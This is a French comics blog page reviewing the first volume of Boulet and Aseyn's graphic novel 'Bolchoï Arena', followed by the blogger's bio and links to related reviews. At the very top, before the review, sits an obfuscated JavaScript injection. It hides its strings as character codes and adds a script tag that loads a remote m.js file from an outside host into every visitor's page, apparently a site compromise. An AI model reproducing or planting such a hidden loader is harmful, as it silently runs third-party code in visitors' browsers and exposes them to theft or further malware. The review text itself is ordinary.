Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Bolchoi Arena, une réalité virtuelle plus vraie que nature

    Bolchoï Arena, t.1: Caelum Incognito, Boulet (scénario), Aseyn (dessin). Editions Delcourt, 160 pages, 23,95 euros.

    Rien à voir avec le célèbre théâtre de Moscou ! Dans un futur proche, le Bolchoï Arena est le nouveau jeu vidéo immersif à la mode. Plus même, il s’agit là d’un réseau mondial de réalité virtuelle qui immerge les joueurs dans un univers infini. Néophyte, Marje, y plonge avec son amie Dana. Pour cette étudiante en astrophysique, c’est d’abord la perspective de pouvoir toucher du doigt les planètes qu’elle étudie, des volcans de glace de Ganymède aux brumes de Titan, et de nourrir ainsi sa thèse de cette nouvelle expérience. Mais, progressivement, elle va se prendre au jeu, dévoilant des talents étonnants dans l’art de piloter des vaisseaux et de détruire ses adversaires. Au point, lors d’un incident du réseau, à se fondre dans celui-ci.

    Une plongée renversante dans l’univers du Bolchoi Arena…

    Au printemps, Alt-Life, de Joseph Falzon et Thomas Cadène avait déjà proposé une belle réflexion sur la réalité virtuelle et les perspectives, quasi-philosophiques et épistémologiques qu’ouvre celle-ci. Boulet aborde le sujet de manière à la fois plus ludique et plus réaliste. Et l’immersion est particulièrement réussie également, et ce dès la séquence introductive qui fait fait immédiatement basculer le lecteur dans cet autre univers. Dès lors, les allers-retours entre réalité et réalité virtuelle vont s’enchaîner à un rythme soutenu, juste assez déstabilisants pour surprendre mais sans jamais faire perdre le fil du récit. Et parfaitement présentés pour refléter la dépendance progressive des joueurs à ce jeu “plus vrai que la réalité”.
    Nourri des influences des mangas – auquel le style d’Aseyn apporte une touche délicate très réussie – mais aussi de l’univers des geeks des jeux vidéo et des thématiques récentes de la SF (du Ready Player One de Spielberg à Summer Wars de Mamoru Hosoda), Bolchoï Arena n’en oublie pas pour autant ses personnages. Et ce n’est pas la moindre des réussites que de parvenir à mettre ainsi de la chair et une vraie consistance à ce monde numérique. Les auteurs parviennent en tout cas à créer une empathie qui, à la fin de ce premier volume (sur trois prévus), suscite une attente haletante de la suite. Captivant et immersif comme un (très) bon jeu vidéo.

    Une sur-couverture plastique vient encore renforcer cet aspect atypique, ludique et technoïde.

    Commentez ou exprimez-vous grâce aux emojis !
    1
    SUPER !SUPER !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    L’Histoire autrement

    [media id=8 width=320 height=240] L’histoire autrement Commentez ou exprimez-vous grâce aux emojis ! 0J'AIME0J'ADORE0Haha0WOUAH0SUPER ...

    L’actualité très honorée

    Petite anthologie du dessin politique, Honoré, préfaces François Morel et Hélène Honoré. Editions de ...

    La deuxième offensive des Poilus

    Paroles de Poilus, tome 2 : Mon papa en guerre, collectif. Editions Soleil. 96 ...

    Fenêtres sur rue : Rabaté revisite Hitchcock avec Tati

    Fenêtres sur rue, Pascal Rabaté, éditions Noctambule/Soleil, 56 pages, 18,95 euros. “C’est un travail ...

    Binet poursuit dans l’humour classique

    Haut de gamme, volume 2 : Ma non troppo, Binet. Editions Dargaud, 48 pages, ...

    Mes quinze coups de coeur 2019

    Dernier jour de l’année et, rendez-vous désormais habituel, retour sur cette année à travers ...